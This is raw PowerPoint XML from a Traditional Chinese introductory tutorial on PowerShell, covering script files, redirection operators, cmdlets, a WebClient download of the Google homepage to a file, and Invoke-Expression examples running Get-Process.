            <a:ext cx="7876397" cy="36338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webClient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New-Object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System.Net.WebClient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"https://www.google.com/"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 = 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webClient.DownloadString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&gt;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google.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>若要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>以指令稿檔案的方式執行這段程式碼，首先要把它們儲存成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的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>指令搞檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>（副檔名為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.ps1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dirty="0" smtClean="0"/>
              <a:t>假設</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>我們將其儲存在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C:OfficeGuidescript.ps1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則</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>可在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命令列中直接執行這個檔案，即可讓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執行其中的內容：</a:t>
            </a:r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C:OfficeGuidescript.ps1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59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338328"/>
            <a:ext cx="7920880" cy="1252728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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>稿 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example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3"/>
              </a:rPr>
              <a:t>Office </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>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5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can easily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import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>modules,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access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>core Windows APIs,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execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>remote commands,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start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>a process cmdlet which can be used to run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>an executable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>the Invoke-Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> which runs a command locally or on a remote computer. </a:t>
            </a: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Function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 smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>cynet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37334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重新導向運算子如下所示，其中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zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>代表資料流程號碼。 如果未指定任何資料流程，則 成功 的資料流程 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>( 1 ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>為預設值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338328"/>
            <a:ext cx="7920880" cy="1252728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重新導向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>操作員</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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17885"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="323529" y="3789040"/>
          <a:ext cx="8568951" cy="240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486054">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
                        <a:t>運算子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描述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語法</a:t>
                      </a:r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altLang="zh-TW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將指定的資料流程傳送至檔案。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n&gt;</a:t>
                      </a:r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altLang="zh-TW"/>
                        <a:t>&gt;&gt;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將指定的資料流程 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" b="1"/>
                        <a:t>附加</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US"/>
                        <a:t> 至檔案。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n&gt;&gt;</a:t>
                      </a:r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en-US" altLang="zh-TW"/>
                        <a:t>&gt;&amp;1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將指定的資料流程重新 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" i="1"/>
                        <a:t>導向</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US"/>
                        <a:t> 至 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" b="1"/>
                        <a:t>成功</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US"/>
                        <a:t> 資料流程。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n&gt;&amp;1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8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Operators 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SS64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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 smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Micorsoft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34612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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>在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zh-TW" altLang="en-US" dirty="0"/>
              <a:t>作業中，于背景執行管線。 這個運算子的運作方式類似于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>UNIX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>控制運算子符號 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(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) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，它會在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>subshell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中以非同步方式執行命令，以做為作業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zh-TW" altLang="en-US" dirty="0"/>
              <a:t>背景運算子也是語句結束字元，就像 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>UNIX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>控制運算子符號 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(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) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>一樣。 這可讓您在背景運算子之後叫用其他命令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/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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背景運算子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zh-TW" dirty="0" smtClean="0"/>
              <a:t>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err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Micorsoft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4191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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>module contains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cmdlets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> that manage the basic features of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Microsoft.PowerShell.Utility</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Module</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600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3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Commands for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are known as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cmdlets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> (pronounced command-lets). </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>addition to cmdlets,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allows you to run any command available on your system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cmdlets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>are native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commands, not stand-alone executables. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>cmdlets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>are collected into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modules that can be loaded on demand. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>cmdlets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>can be written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/>
              <a:t>any compiled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.NET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>language </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>or </a:t>
            </a:r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/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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scripting language </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>itself.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What is a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command (cmdlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)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/>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Stephen J. Bigelow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r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0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uses a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verb-Noun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> name pair to name cmdlets. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>example,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Get-Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> cmdlet included in PowerShell is used to get all the cmdlets that are registered in the command shell.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verb identifies the action that the cmdlet performs, and the noun identifies the resource on which the cmdlet performs its action.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cmdlet names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2"/>
              </a:rPr>
              <a:t>Microsoft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5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564904"/>
            <a:ext cx="8496944" cy="3888431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A cmdlet -- pronounced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>command-let</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> -- is a small, lightweight command that is used in the Windows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environment. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>cmdlet typically exists as a small script that is intended to perform a single specific function such as coping files and changing directories. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>cmdlet and its relevant parameters can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be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>entered in a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PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> command line for immediate execution </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>                   or </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>be included </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>as part of a longer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PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> script that can be executed as desired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cmdlet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 smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Stephen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>J. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Bigelow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6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cmdlets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>are based on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.NET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and rely on the use of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.NET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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altLang="zh-TW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Thus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, cmdlets can receive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en-US" altLang="zh-TW" dirty="0"/>
              <a:t> as input and deliver objects as output, which can then feed the input of subsequent objects, enabling cmdlets to form a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 pipeline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How do cmdlets work</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>?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Stephen J. Bigelow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0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b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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3600" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="36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6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     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[-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Command] &lt;String&gt;      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[&lt;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CommonParameters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69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Syntax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59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3600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="36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sz="3600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>初學者快速入門教學 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Office Guide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>]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8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/>
              <a:t> cmdlet evaluates or runs a specified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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altLang="zh-TW" dirty="0"/>
              <a:t> as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and returns the results of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>command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Without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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>a string submitted at the command line is returned (echoed) unchanged.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Description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30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31552" y="2204864"/>
            <a:ext cx="8604944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 = "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Get-Process"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"Get-Process"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C:\Users\F&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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C:\Users\F&gt;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</a:t>
            </a:r>
          </a:p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145      11     1420       1684          0  11152   1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116      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9     1300       1576              3888   0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AsLdrSrv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altLang="zh-TW" sz="14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261     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16     5300       3260          0   7764   1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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ApplicationFrameHost</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="14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ctr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Example 1: Evaluate an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endParaRPr lang="en-US" altLang="zh-TW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hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>1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5496" y="29156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hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>2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5496" y="34197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hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>3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 =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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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</a:t>
            </a:r>
          </a:p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145      11     1492       1912          0  11152   1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116       9     1300       1576              3888   0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AsLdrSrv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zh-TW" alt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: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無法將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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System.Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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[]'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轉換為 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'Command'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參數所需的 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System.String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型別。不支援指定的方法。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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位於 線路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字元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:19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Invoke-Expression $Command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                ~~~~~~~~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CategoryInfo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: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InvalidArgument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(:) [Invoke-Expression]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，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ParameterBindingException</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1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FullyQualifiedErrorId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CannotConvertArgument,Microsoft.PowerShell.Commands.InvokeExpressionCommand</a:t>
            </a:r>
          </a:p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 Does not Contain a String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380312" y="4138047"/>
            <a:ext cx="165618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System.Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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zh-TW" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="右大括弧 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7308304" y="3284984"/>
            <a:ext cx="72008" cy="79208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7404100" y="3679180"/>
            <a:ext cx="723900" cy="469900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 723900"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 469900"/>
              <a:gd name="connsiteX1" fmla="*/ 723900 w 723900"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 469900"/>
              <a:gd name="connsiteX2" fmla="*/ 723900 w 723900"/>
              <a:gd name="connsiteY2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900" h="469900">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="723900" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="723900" y="469900"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C0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3644900" y="4165600"/>
            <a:ext cx="3721100" cy="355600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3721100"/>
              <a:gd name="connsiteY0" fmla="*/ 355600 h 355600"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 3721100"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 355600"/>
              <a:gd name="connsiteX2" fmla="*/ 3721100 w 3721100"/>
              <a:gd name="connsiteY2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1100" h="355600">
                <a:moveTo>
                  <a:pt x="0" y="355600"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3721100" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dash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0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420888"/>
            <a:ext cx="8856983" cy="4176464"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>demonstrates the use of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/>
              <a:t> to evaluate an expression. Without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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the expression is printed, but not evaluated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The first command assigns a value of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r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> (a string) to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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty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r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>variable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1)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The second command shows the effect of typing the variable name at the command line. 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(2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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 smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>echoes the string.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The third command uses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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>to evaluate the string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(3)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Explanation of Example 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24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132856"/>
            <a:ext cx="8604944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C:\Users\F&gt;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"Get-Process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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altLang="zh-TW" sz="1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145      11     1420       1684          0  11152   1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116       9     1300       1576              3888   0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AsLdrSrv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altLang="zh-TW" sz="14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261     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16     5300       3260          0   7764   1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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ApplicationFrameHost</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="14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==============================================================================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endParaRPr lang="en-US" altLang="zh-TW" sz="1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145      11     1420       1684          0  11152   1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116       9     1300       1576              3888   0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AsLdrSrv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261      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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16     5300       3260          0   7764   1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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ApplicationFrameHost</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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: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 1-1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750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564904"/>
            <a:ext cx="8640959" cy="37058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$a=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'$a'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zh-TW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'$a'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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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無法辨識 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zh-TW" altLang="en-US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詞彙是否為 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Cmdlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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、函數、指令檔或可執行程式的名稱。請檢查名稱拼字是否正確，如果包含路徑的話，請確認路徑是否正確，然後再試一次。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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位於 線路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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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字元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</a:t>
            </a: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Hello</a:t>
            </a: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~~~~~</a:t>
            </a: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7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CategoryInfo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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="17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ObjectNotFound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altLang="zh-TW" sz="17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Hello:String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[], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="17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CommandNotFoundException</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="17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7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FullyQualifiedErrorId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altLang="zh-TW" sz="17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CommandNotFoundException</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="17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1-2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="手繪多邊形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2865120" y="2956560"/>
            <a:ext cx="314960" cy="1178560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
